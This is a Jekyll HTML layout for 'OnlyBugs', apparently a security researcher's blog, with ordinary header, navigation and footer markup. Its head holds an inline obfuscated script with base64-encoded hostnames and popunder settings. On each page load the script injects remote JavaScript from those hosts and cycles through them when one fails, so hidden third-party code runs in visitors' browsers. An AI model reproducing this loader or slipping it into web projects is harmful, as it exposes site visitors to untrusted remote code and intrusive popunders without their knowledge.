<!DOCTYPE html>
<html lang="{{ site.lang | default: 'en-US' }}">
<head>
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  {% seo %}





  <link rel="preconnect" href="https://fonts.googleapis.com">
  <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
  <link href="https://fonts.googleapis.com/css2?family=Inter:wght@400;500;700&family=Fira+Code:wght@400;500;700&display=swap" rel="stylesheet">
  <link rel="stylesheet" href="{{ '/assets/css/main.css' | relative_url }}">
  <script type="text/javascript" data-cfasync="false">
/*<![CDATA[/* */
(function(){var q=window,p="dd5dc1f1c6af03605edf11a7b8818000",k=[["siteId",455-185+231+881+5298284],["minBid",0],["popundersPerIP","0"],["delayBetween",0],["default",false],["defaultPerDay",0],["topmostLayer","auto"]],z=["d3d3LmFudGlhZGJsb2Nrc3lzdGVtcy5jb20vcG9RVEdEL09qRC9zbW9jay1taW4uanM=","ZDNjb2Q4MHRobjdxbmQuY2xvdWRmcm9udC5uZXQvcXdlY2hhdC5taW4uanM=","d3d3LnV3c29sbnlzaXZxLmNvbS9TZS9oL2Vtb2NrLW1pbi5qcw==","d3d3LmV1ZGRrcmpmb2x3cnIuY29tL2h3ZWNoYXQubWluLmpz"],n=-1,a,o,s=function(){clearTimeout(o);n++;if(z[n]&&!(1804611122000<(new Date).getTime()&&1<n)){a=q.document.createElement("script");a.type="text/javascript";a.async=!0;var h=q.document.getElementsByTagName("script")[0];a.src="https://"+atob(z[n]);a.crossOrigin="anonymous";a.onerror=s;a.onload=function(){clearTimeout(o);q[p.slice(0,16)+p.slice(0,16)]||s()};o=setTimeout(s,5E3);h.parentNode.insertBefore(a,h)}};if(!q[p]){try{Object.freeze(q[p]=k)}catch(e){}s()}})();
/*]]>/* */
</script>
</head>
<body>

  <header class="site-header">
    <div class="container nav-container">
      <a href="/" class="site-title">
        Only<span>Bugs</span>
      </a>
      <nav class="nav-links">
        <a href="/" class="nav-link">Home</a>
        <a href="/blog" class="nav-link">Blog</a>
        <a href="/terms" class="nav-link">Terms</a>
      </nav>
    </div>
  </header>

  <main>
    {{ content }}
  </main>

  <footer class="site-footer">
    <div class="container">
      <p class="footer-quote">"The best security researchers are those who never stop learning." 🔐</p>

      <div class="social-links">
        <a href="https://hackerone.com/onlybugs05">HackerOne</a>
        <a href="https://github.com/onlybugs05">GitHub</a>
      </div>
      <p>&copy; {{ site.time | date: '%Y' }} Jetti Hrushikesh (@OnlyBugs05). All Rights Reserved.</p>
    </div>
  </footer>

  <script src="{{ '/assets/js/main.js' | relative_url }}"></script>

</body>
</html>
